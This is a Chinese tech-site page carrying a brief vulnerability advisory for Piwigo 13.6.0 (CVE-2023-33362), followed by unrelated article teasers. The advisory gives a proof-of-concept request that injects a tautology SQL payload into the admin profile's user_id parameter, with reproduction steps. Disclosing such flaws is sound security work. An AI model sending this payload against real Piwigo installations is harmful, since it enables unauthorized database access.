news 2026/3/24 9:27:35

Piwigo 13.6.0 SQL注入漏洞技术分析

作者头像

张小明

前端开发工程师

1.2k 24
文章封面图
Piwigo 13.6.0 SQL注入漏洞技术分析

漏洞标题: Piwigo 13.6.0 - SQL注入

日期: 2025-11-25

漏洞作者: CodeSecLab

供应商主页: https://github.com/Piwigo/Piwigo

软件链接: https://github.com/Piwigo/Piwigo

版本: 13.6.0

测试环境: Windows

CVE : CVE-2023-33362

概念验证 (Proof Of Concept):

GET /admin.php?page=profile&user_id=' OR 1=1 -- HTTP/1.1 Host: piwigo

复现步骤

  1. 以管理员用户身份登录。
  2. 发送上述请求。
  3. 观察结果。
    eQ7SPjxu3wq/iZYjEnW1MGmV38jUHbHn2zgMGOH0b6HX88G3Bid6YZy0EvGAkKdU
    更多精彩内容 请关注我的个人公众号 公众号(办公AI智能小助手)
    对网络安全、黑客技术感兴趣的朋友可以关注我的安全公众号(网络安全技术点滴分享)
版权声明: 本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若内容造成侵权/违法违规/事实不符,请联系邮箱:809451989@qq.com进行投诉反馈,一经查实,立即删除!
网站建设 2026/3/15 11:32:06

AI图像分割实战:从技术突破到行业应用的智能分割解决方案

AI图像分割实战:从技术突破到行业应用的智能分割解决方案 【免费下载链接】segment-anything The repository provides code for running inference with the SegmentAnything Model (SAM), links for downloading the trained model checkpoints, and example note…

作者头像 李华
网站建设 2026/3/23 10:20:44

可视化运行管理:运行监控管理规范

引言运行管理的核心在于预见与掌控。传统依赖人工巡检与日志分析的模式,在日益复杂的网络系统面前已显乏力。信息滞后、问题定位模糊、资源状态不透明,成为运维效率的瓶颈。可视化运行管理应运而生,其目标是将无形的数据流、资源状态与运行逻…

作者头像 李华
网站建设 2026/3/15 17:12:45

PyTorch-CUDA基础镜像评测:从安装到Jupyter Notebook实战

PyTorch-CUDA基础镜像实战:从零构建高效深度学习开发环境 在当今AI研发节奏日益加快的背景下,一个常见的场景是:算法工程师拿到新服务器后,本应立刻投入模型调优,却不得不先花上半天甚至一整天来“折腾环境”——驱动版…

作者头像 李华
网站建设 2026/3/19 9:38:49

QuickJS完全指南:从入门到精通的完整教程

QuickJS完全指南:从入门到精通的完整教程 【免费下载链接】quickjs Public repository of the QuickJS Javascript Engine. Pull requests are not accepted. Use the mailing list to submit patches. 项目地址: https://gitcode.com/gh_mirrors/qu/quickjs …

作者头像 李华
网站建设 2026/3/15 16:41:43

PyTorch 2.7 + CUDA 完美集成,这个Docker镜像让你效率翻倍

PyTorch 2.7 CUDA 完美集成,这个Docker镜像让你效率翻倍 在深度学习项目中,你是否经历过这样的场景:好不容易复现了一篇论文的代码,却因为本地环境缺少某个 CUDA 版本而卡住?或者团队新成员花了整整两天才把 PyTorch …

作者头像 李华